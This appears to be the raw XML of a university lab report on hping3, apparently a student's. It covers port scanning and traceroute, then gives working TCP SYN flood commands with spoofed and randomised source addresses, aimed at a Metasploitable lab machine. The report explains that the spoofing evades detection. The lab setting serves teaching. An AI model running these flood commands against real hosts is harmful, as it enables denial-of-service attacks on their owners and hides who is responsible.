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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b.   HPING3</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INTRODUCTION</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hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the Tcl language.</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EXECUTION STEPS</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installing hping3 from a package</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install hping3</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Scanning</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 -S &lt;ip_address&gt; -p &lt;port&gt; -c &lt;number_of_packets&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 -S 192.168.225.128 -p 80 -c 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4310063" cy="882784"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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310063" cy="882784"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will scan port 80 on specified metasploitable IP. As we can see from the output returned packet from specified metasploitable IP contains SYN and ACK flags set which indicates an open port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use -c 1 flag in order to send the SYN packet only once</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to scan a range of ports starting from port 80 and up use the following command line,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4289258" cy="1643063"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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289258" cy="1643063"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceroute using Hping3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This illustration is like popular utilities like tracert (windows) or traceroute (linux) who utilizes ICMP packets expanding each time in 1 its TTL value.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Syntax - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 --traceroute -V -1 &lt;ip_address&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4319588" cy="2209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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319588"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ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform A TCP Syn Flood Attack With Kali Linux &amp; Hping3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 -a &lt;FAKE IP&gt; &lt;target&gt; -S -q -p 80 --faster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 -a 192.168.225.128 192.168.225.128 -S -q -p 80 --faster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4393043" cy="865936"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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393043" cy="865936"/>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720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.225.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4421116" cy="1048598"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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421116" cy="1048598"/>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t xml:space="preserve">We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each. We’re specifying that the SYN Flag (-S) should be enabled, with a TCP window size of 64 (-w 64). To direct the attack to our victum’s HTTP web server we specify port 80 (-p 80) and use the --flood flag to send packets as fast as possible. As you’d expect, the --rand-source flag generates spoofed IP addresses to disguise the real source and avoid detection but at the same time stop the victim’s SYN-ACK reply packets from reaching the attacker.</w:t>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CONCLUSION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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hping3 is a command line utility to perform port scanning and flood attacks which can also be spoofed to point to the target location itself.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols like ICMP, FIN, etc.</w:t>
      </w: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REFERENCES</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Hping3 Tricks and Tips</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://iphelix.medium.com/hping-tips-and-tricks-85698751179f</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hping3 flood ddos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://linuxhint.com/hping3/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Performing TCP SYN Flood attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.firewall.cx/general-topics-reviews/network-protocol-analyzers/1224-performing-tcp-syn-flood-attack-and-detecting-it-with-wireshark.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId15" w:type="default"/>
      <w:headerReference r:id="rId16" w:type="first"/>
      <w:footerReference r:id="rId17"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jc w:val="center"/>
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="4"/>
        <w:szCs w:val="4"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">R V COLLEGE OF ENGINEERING</w:t>
      <w:br w:type="textWrapping"/>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Name: </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">ANKIT KUMAR </w:t>
      <w:tab/>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">USN: </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">1RV18IS007     </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Dept/Lab: </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">ISE/CSDF     </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Expt No: </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">01 b </w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Date: </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">26/11/2021</w:t>
      <w:tab/>
      <w:tab/>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> Title:</w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b w:val="1"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">INFORMATION GATHERING TOOLS</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:pict>
        <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>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5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/hping3/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iphelix.medium.com/hping-tips-and-tricks-85698751179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eader" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.firewall.cx/general-topics-reviews/network-protocol-analyzers/1224-performing-tcp-syn-flood-attack-and-detecting-it-with-wireshark.html" TargetMode="External"/><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SOpr7wJf0pSsQ/KISPyOlT/NFAQ==">AMUW2mXKmKoKzxT8zE71l+Rxs0TzGrjderhzZB1VPBTrRjn0EdZXRlzWz8gCqnVdImjFt7R+K+ZF7qVKJR5sttVeYrjQDtmp6nHYM59mvqTV/rC8O8A3W+g=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